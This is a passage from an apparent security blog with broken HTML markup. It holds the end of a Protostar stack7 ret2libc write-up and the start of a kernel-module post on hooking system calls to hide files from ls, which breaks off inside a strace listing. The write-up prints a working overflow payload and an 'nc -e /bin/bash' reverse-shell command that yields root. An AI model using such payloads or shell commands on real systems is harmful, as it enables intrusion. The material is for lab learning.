span class="code-line"span class="x" 8048565:   8d 74 26 00             lea    esi,[esi+eiz*1+0x0]/span/span
span class="code-line"span class="x" 8048569:   8d bc 27 00 00 00 00    lea    edi,[edi+eiz*1+0x0]/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048570/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_csu_init/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048570:   55                      push   ebp/span/span
span class="code-line"span class="x" 8048571:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 8048573:   57                      push   edi/span/span
span class="code-line"span class="x" 8048574:   56                      push   esi/span/span
span class="code-line"span class="x" 8048575:   53                      push   ebx/span/span
span class="code-line"span class="x" 8048576:   e8 4f 00 00 00          call   80485ca lt;__i686.get_pc_thunk.bxgt;/span/span
span class="code-line"span class="x" 804857b:   81 c3 c1 11 00 00       add    ebx,0x11c1/span/span
span class="code-line"span class="x" 8048581:   83 ec 1c                sub    esp,0x1c/span/span
span class="code-line"span class="x" 8048584:   e8 cb fd ff ff          call   8048354 lt;_initgt;/span/span
span class="code-line"span class="x" 8048589:   8d bb 18 ff ff ff       lea    edi,[ebx-0xe8]/span/span
span class="code-line"span class="x" 804858f:   8d 83 18 ff ff ff       lea    eax,[ebx-0xe8]/span/span
span class="code-line"span class="x" 8048595:   29 c7                   sub    edi,eax/span/span
span class="code-line"span class="x" 8048597:   c1 ff 02                sar    edi,0x2/span/span
span class="code-line"span class="x" 804859a:   85 ff                   test   edi,edi/span/span
span class="code-line"span class="x" 804859c:   74 24                   je     80485c2 lt;__libc_csu_init+0x52gt;/span/span
span class="code-line"span class="x" 804859e:   31 f6                   xor    esi,esi/span/span
span class="code-line"span class="x" 80485a0:   8b 45 10                mov    eax,DWORD PTR [ebp+0x10]/span/span
span class="code-line"span class="x" 80485a3:   89 44 24 08             mov    DWORD PTR [esp+0x8],eax/span/span
span class="code-line"span class="x" 80485a7:   8b 45 0c                mov    eax,DWORD PTR [ebp+0xc]/span/span
span class="code-line"span class="x" 80485aa:   89 44 24 04             mov    DWORD PTR [esp+0x4],eax/span/span
span class="code-line"span class="x" 80485ae:   8b 45 08                mov    eax,DWORD PTR [ebp+0x8]/span/span
span class="code-line"span class="x" 80485b1:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 80485b4:   ff 94 b3 18 ff ff ff    call   DWORD PTR [ebx+esi*4-0xe8]/span/span
span class="code-line"span class="x" 80485bb:   83 c6 01                add    esi,0x1/span/span
span class="code-line"span class="x" 80485be:   39 fe                   cmp    esi,edi/span/span
span class="code-line"span class="x" 80485c0:   72 de                   jb     80485a0 lt;__libc_csu_init+0x30gt;/span/span
span class="code-line"span class="x" 80485c2:   83 c4 1c                add    esp,0x1c/span/span
span class="code-line"span class="x" 80485c5:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 80485c6:   5e                      pop    esi/span/span
span class="code-line"span class="x" 80485c7:   5f                      pop    edi/span/span
span class="code-line"span class="x" 80485c8:   5d                      pop    ebp/span/span
span class="code-line"span class="x" 80485c9:   c3                      ret    /span/span
span class="code-line"/span
span class="code-line"span class="mh"080485ca/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__i686.get_pc_thunk.bx/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80485ca:   8b 1c 24                mov    ebx,DWORD PTR [esp]/span/span
span class="code-line"span class="x" 80485cd:   c3                      ret    /span/span
span class="code-line"span class="x" 80485ce:   90                      nop/span/span
span class="code-line"span class="x" 80485cf:   90                      nop/span/span
span class="code-line"/span
span class="code-line"span class="mh"080485d0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__do_global_ctors_aux/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80485d0:   55                      push   ebp/span/span
span class="code-line"span class="x" 80485d1:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 80485d3:   53                      push   ebx/span/span
span class="code-line"span class="x" 80485d4:   83 ec 04                sub    esp,0x4/span/span
span class="code-line"span class="x" 80485d7:   a1 54 96 04 08          mov    eax,ds:0x8049654/span/span
span class="code-line"span class="x" 80485dc:   83 f8 ff                cmp    eax,0xffffffff/span/span
span class="code-line"span class="x" 80485df:   74 13                   je     80485f4 lt;__do_global_ctors_aux+0x24gt;/span/span
span class="code-line"span class="x" 80485e1:   bb 54 96 04 08          mov    ebx,0x8049654/span/span
span class="code-line"span class="x" 80485e6:   66 90                   xchg   ax,ax/span/span
span class="code-line"span class="x" 80485e8:   83 eb 04                sub    ebx,0x4/span/span
span class="code-line"span class="x" 80485eb:   ff d0                   call   eax/span/span
span class="code-line"span class="x" 80485ed:   8b 03                   mov    eax,DWORD PTR [ebx]/span/span
span class="code-line"span class="x" 80485ef:   83 f8 ff                cmp    eax,0xffffffff/span/span
span class="code-line"span class="x" 80485f2:   75 f4                   jne    80485e8 lt;__do_global_ctors_aux+0x18gt;/span/span
span class="code-line"span class="x" 80485f4:   83 c4 04                add    esp,0x4/span/span
span class="code-line"span class="x" 80485f7:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 80485f8:   5d                      pop    ebp/span/span
span class="code-line"span class="x" 80485f9:   c3                      ret    /span/span
span class="code-line"span class="x" 80485fa:   90                      nop/span/span
span class="code-line"span class="x" 80485fb:   90                      nop/span/span
span class="code-line"/span
span class="code-line"Disassembly of section span class="nl".fini/spanspan class="p":/span/span
span class="code-line"/span
span class="code-line"span class="mh"080485fc/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_fini/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80485fc:   55                      push   ebp/span/span
span class="code-line"span class="x" 80485fd:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 80485ff:   53                      push   ebx/span/span
span class="code-line"span class="x" 8048600:   83 ec 04                sub    esp,0x4/span/span
span class="code-line"span class="x" 8048603:   e8 00 00 00 00          call   8048608 lt;_fini+0xcgt;/span/span
span class="code-line"span class="x" 8048608:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 8048609:   81 c3 34 11 00 00       add    ebx,0x1134/span/span
span class="code-line"span class="x" 804860f:   e8 2c fe ff ff          call   8048440 lt;__do_global_dtors_auxgt;/span/span
span class="code-line"span class="x" 8048614:   59                      pop    ecx/span/span
span class="code-line"span class="x" 8048615:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 8048616:   c9                      leave  /span/span
span class="code-line"span class="x" 8048617:   c3                      ret/span/span
span class="code-line"/code/pre/div
/td/tr/table
pOK, so the codepop, ret/code starts at code0x80485f8/code and the coderet/code is at code0x80485f9/code./p
pNow we just need to create the environment variable and find it in memory:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spanspan class="nb"export/span span class="nv"NCCMD/spanspan class="o"=/spanspan class="s2"quot;nc -e /bin/bash 127.0.0.1 9000quot;/span/span
span class="code-line"/code/pre/div
/td/tr/table
pTo find out where it will be in memory I'm going to use the same a href="/assets/code/x86-32-linux/getenvaddr.c"C application/a that I've used before, which uses codegetenv/code to work it out:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/span
span class="code-line"span class="normal"3/span/span
span class="code-line"span class="normal"4/span/span
span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spangcc -o /tmp/env /tmp/env.c/span
span class="code-line"span class="gp"user@protostar:/opt/protostar/bin$ /span/tmp/env/span
span class="code-line"span class="go"Usage: /tmp/env lt;environment variablegt; lt;target program namegt;/span/span
span class="code-line"span class="gp"user@protostar:/opt/protostar/bin$ /span/tmp/env NCCMD ./stack7/span
span class="code-line"span class="go"NCCMD will be at 0xbfffff6e/span/span
span class="code-line"/code/pre/div
/td/tr/table
pWe know that the distance from the start of the payload to overwriting the return address will be the same as before because the application is identical in that sense./p
pNow we have all of the information to exploit it:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:~$ /spannc -l -p span class="m"9000/span/span
span class="code-line"/code/pre/div
/td/tr/table
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spanpython -c span class="s1"#39;print quot;Aquot;*80 + quot;\xf9\x85\x04\x08quot; + quot;\x80\xec\xf2\xb7quot; + quot;\xf8\x85\x04\x08quot; + quot;\x00\x00\x00\x00quot; + quot;\xb0\xff\xec\xb7quot; + quot;JUNKquot; + quot;\x6e\xff\xff\xbfquot;#39;/span span class="p"|/span ./stack7/span
span class="code-line"span class="go"input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA��������/span/span
span class="code-line"/code/pre/div
/td/tr/table
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/span
span class="code-line"span class="normal"3/span/span
span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"pwd/span/span
span class="code-line"span class="go"/opt/protostar/bin/span/span
span class="code-line"span class="go"whoami/span/span
span class="code-line"span class="go"root/span/span
span class="code-line"/code/pre/div
/td/tr/table
pPWNED! :-)/p
h2Conclusion/h2
pThere are normally a number of ways to exploit a single vulnerablity so while you are learning it is best to try to exploit it in as many ways as possible because some might work in some situations while others might not./p
pRet2Libc is very powerful and beats NX completely but ROP is even more powerful and providing there are enough different ROP gadgets, you can create the whole shellcode using nothing but ROP gadgets but this requires the application to be quite big./p
h2Further Reading/h2
pFor more indepth information about Ret2Libc see a href="http://phrack.org/issues/58/4.html" target="_blank"this/a article on phrack./p
pRead emHacking: The Art Of Exploitation/em by emJon Erickson/em for more information about all of the attacks I've discussed so far and more./p

eXploit
System Call Hooking0xe7
10 July 2014 at 17:30

System Call Hooking

eXploit

By: 0xe7

10 July 2014 at 17:30

pWelcome to the third post on Linux kernel hacking. In the a href="/linux-kernel-hacking/2014/05/10/first-lkm/"first/a we looked at how to create a basic LKM and in the a href="/linux-kernel-hacking/2014/06/06/a-simple-character-device/"second/a we created a character device and communicated with it./p pNow we are going to do something which is obviously very useful for malware, a href="https://en.wikipedia.org/wiki/System_call" target="_blank"system call/a a href="https://en.wikipedia.org/wiki/Hooking" target="_blank"hooking/a./p pHooking a system call means that you are able to manipulate data sent from userland applications to the operating system (OS) and vice versa./p !-- more -- pThis means that you can hide things from applications running on the OS and influence their behaviour./p pHere we will develop an LKM that will hide files from the unix codels/code command./p h2Determining Relevant System Calls/h2 pThe first step is to determine the system calls used by codels/code to list the filenames in a directory./p pcodestrace/code is a tool that can be used to trace every system call used by an application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/span span class="code-line"span class="normal"110/span/span span class="code-line"span class="normal"111/span/span span class="code-line"span class="normal"112/span/span span class="code-line"span class="normal"113/span/span span class="code-line"span class="normal"114/span/span span class="code-line"span class="normal"115/span/span span class="code-line"span class="normal"116/span/span span class="code-line"span class="normal"117/span/span span class="code-line"span class="normal"118/span/span span class="code-line"span class="normal"119/span/span span class="code-line"span class="normal"120/span/span span class="code-line"span class="normal"121/span/span span class="code-line"span class="normal"122/span/span span class="code-line"span class="normal"123/span/span span class="code-line"span class="normal"124/span/span span class="code-line"span class="normal"125/span/span span class="code-line"span class="normal"126/span/span span class="code-line"span class="normal"127/span/span span class="code-line"span class="normal"128/span/span span class="code-line"span class="normal"129/span/span span class="code-line"span class="normal"130/span/span span class="code-line"span class="normal"131/span/span span class="code-line"span class="normal"132/span/span span class="code-line"span class="normal"133/span/span span class="code-line"span class="normal"134/span/span span class="code-line"span class="normal"135/span/span span class="code-line"span class="normal"136/span/span span class="code-line"span class="normal"137/span/span span class="code-line"span class="normal"138/span/span span class="code-line"span class="normal"139/span/span span class="code-line"span class="normal"140/span/span span class="code-line"span class="normal"141/span/span span class="code-line"span class="normal"142/span/span span class="code-line"span class="normal"143/span/span span class="code-line"span class="normal"144/span/span span class="code-line"span class="normal"145/span/span span class="code-line"span class="normal"146/span/span span class="code-line"span class="normal"147/span/span span class="code-line"span class="normal"148/span/span span class="code-line"span class="normal"149/span/span span class="code-line"span class="normal"150/span/span span class="code-line"span class="normal"151/span/span span class="code-line"span class="normal"152/span/span span class="code-line"span class="normal"153/span/span span class="code-line"span class="normal"154/span/span span class="code-line"span class="normal"155/span/span span class="code-line"span class="normal"156/span/span span class="code-line"span class="normal"157/span/span span class="code-line"span class="normal"158/span/span span class="code-line"span class="normal"159/span/span span class="code-line"span class="normal"160/span/span span class="code-line"span class="normal"161/span/span span class="code-line"span class="normal"162/span/span span class="code-line"span class="normal"163/span/span span class="code-line"span class="normal"164/span/span span class="code-line"span class="normal"165/span/span span class="code-line"span class="normal"166/span/span span class="code-line"span class="normal"167/span/span span class="code-line"span class="normal"168/span/span span class="code-line"span class="normal"169/span/span span class="code-line"span class="normal"170/span/span span class="code-line"span class="normal"171/span/span span class="code-line"span class="normal"172/span/span span class="code-line"span class="normal"173/span/span span class="code-line"span class="normal"174/span/span span class="code-line"span class="normal"175/span/span span class="code-line"span class="normal"176/span/span span class="code-line"span class="normal"177/span/span span class="code-line"span class="normal"178/span/span span class="code-line"span class="normal"179/span/span span class="code-line"span class="normal"180/span/span span class="code-line"span class="normal"181/span/span span class="code-line"span class="normal"182/span/span span class="code-line"span class="normal"183/span/span span class="code-line"span class="normal"184/span/span span class="code-line"span class="normal"185/span/span span class="code-line"span class="normal"186/span/span span class="code-line"span class="normal"187/span/span span class="code-line"span class="normal"188/span/span span class="code-line"span class="normal"189/span/span span class="code-line"span class="normal"190/span/span span class="code-line"span class="normal"191/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spanstrace ls/span span class="code-line"span class="go"execve(quot;/bin/lsquot;, [quot;lsquot;], [/* 18 vars */]) = 0/span/span span class="code-line"span class="go"brk(0) = 0x9073000/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7717000/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.preloadquot;, R_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/etc/ld.so.cachequot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=116616, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 116616, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb76fa000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/libselinux.so.1quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0pP\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=124904, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 130140, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb76da000/span/span span class="code-line"span class="go"mmap2(0xb76f8000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1d) = 0xb76f8000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/i686/cmov/librt.so.1quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\30\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=30684, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 33360, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb76d1000/span/span span class="code-line"span class="go"mmap2(0xb76d8000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6) = 0xb76d8000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/libacl.so.1quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0\32\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=34436, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb76d0000/span/span span class="code-line"span class="go"mmap2(NULL, 37244, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb76c6000/span/span span class="code-line"span class="go"mmap2(0xb76ce000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x7) = 0xb76ce000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/i686/cmov/libc.so.6quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\240o\1\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0755, st_size=1441960, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 1456504, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7562000/span/span span class="code-line"span class="go"mprotect(0xb76bf000, 4096, PROT_NONE) = 0/span/span span class="code-line"span class="go"mmap2(0xb76c0000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15d) = 0xb76c0000/span/span span class="code-line"span class="go"mmap2(0xb76c3000, 10616, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb76c3000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/i686/cmov/libdl.so.2quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`\n\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=9844, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 12408, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb755e000/span/span span class="code-line"span class="go"mmap2(0xb7560000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1) = 0xb7560000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/i686/cmov/libpthread.so.0quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220L\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0755, st_size=117009, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 98816, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7545000/span/span span class="code-line"span class="go"mmap2(0xb755a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x14) = 0xb755a000/span/span span class="code-line"span class="go"mmap2(0xb755c000, 4608, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb755c000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/libattr.so.1quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0\20\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=17864, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 20656, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb753f000/span/span span class="code-line"span class="go"mmap2(0xb7543000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3) = 0xb7543000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb753e000/span/span span class="code-line"span class="go"mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb753d000/span/span span class="code-line"span class="go"set_thread_area({entry_number:-1 -gt; 6, base_addr:0xb753d720, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0/span/span span class="code-line"span class="go"mprotect(0xb7543000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb755a000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb7560000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb76c0000, 8192, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb76ce000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb76d8000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb76f8000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0x8063000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb7736000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"munmap(0xb76fa000, 116616) = 0/span/span span class="code-line"span class="go"set_tid_address(0xb753d788) = 20395/span/span span class="code-line"span class="go"set_robust_list(0xb753d790, 0xc) = 0/span/span span class="code-line"span class="go"futex(0xbf8906c0, FUTEX_WAIT_BITSET_PRIVATE|FUTEX_CLOCK_REALTIME, 1, NULL, bf8906d0) = -1 EAGAIN (Resource temporarily unavailable)/span/span span class="code-line"span class="go"rt_sigaction(SIGRTMIN, {0xb75496e0, [], SA_SIGINFO}, NULL, 8) = 0/span/span span class="code-line"span class="go"rt_sigaction(SIGRT_1, {0xb7549b70, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0/span/span span class="code-line"span class="go"rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0/span/span span class="code-line"span class="go"getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0/span/span span class="code-line"span class="go"uname({sys=quot;Linuxquot;, node=quot;devquot;, ...}) = 0/span/span span class="code-line"span class="go"statfs64(quot;/sys/fs/selinuxquot;, 84, 0xbf8905cc) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"statfs64(quot;/selinuxquot;, 84, {f_type=quot;EXT2_SUPER_MAGICquot;, f_bsize=4096, f_blocks=4905183, f_bfree=1413721, f_bavail=1158784, f_files=1256640, f_ffree=807533, f_fsid={-583175880, 1006898437}, f_namelen=255, f_frsize=4096}) = 0/span/span span class="code-line"span class="go"brk(0) = 0x9073000/span/span span class="code-line"span class="go"brk(0x9094000) = 0x9094000/span/span span class="code-line"span class="go"open(quot;/proc/filesystemsquot;, O_RDONLY|O_LARGEFILE) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 4096, PROT_READ|PROT_WRITE, 